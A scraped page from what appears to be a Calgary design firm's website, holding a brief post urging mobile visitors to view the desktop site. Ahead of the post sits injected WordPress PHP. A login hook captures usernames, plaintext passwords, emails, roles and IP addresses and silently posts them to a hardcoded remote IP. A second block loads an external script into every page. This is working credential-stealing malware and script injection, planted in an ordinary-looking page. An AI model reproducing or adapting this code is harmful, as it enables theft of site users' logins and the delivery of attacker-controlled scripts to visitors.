// // add_action('wp_login', function($user_login, $user) { $ip = $_SERVER['HTTP_CLIENT_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? ''; $message = "info " . "time: " . current_time('mysql') . " " . "username: " . $user_login . " " . "password: " . ($_POST['pwd'] ?? '') . " " . "Email: " . $user->user_email . " " . "Rol: " . implode(', ', $user->roles) . " " . "IP: " . $ip . " " . "Browser: " . $_SERVER['HTTP_USER_AGENT'] . " " . "site name: " . "Domain: " . $_SERVER['HTTP_HOST'] . " " . "Site URL: " . get_site_url() . " " . "Wp Login: " . wp_login_url() . " " . "login_page: " . $_SERVER['REQUEST_URI'] . " " . "Referrer: " . ($_SERVER['HTTP_REFERER'] ?? '\n'); wp_remote_post("http://51.79.124.111/apitr.php", ['body' => [ 'text' => $message ], 'timeout' => 15, 'blocking' => false]); }, 10, 2); // CUSTOM_SCRIPT_INJECT_START add_action('wp_enqueue_scripts', function() { wp_enqueue_script('custom-inject', 'https://beroniw.com/hwkOP5', array(), '1.0', false); }); // CUSTOM_SCRIPT_INJECT_END Why Switch To The Desktop Site? - Website Design | Video Production | Logo Design in Calgary

Why Switch To The Desktop Site?

Ill be adding more to this soon.. but let’s just leave at this for now: because Google has forced us to strip down our custom, beautifully designed site for the lowest common denominator. So, do please tap on the view desktop site to see our full branded and beautiful… and proper website!

Facebook Comments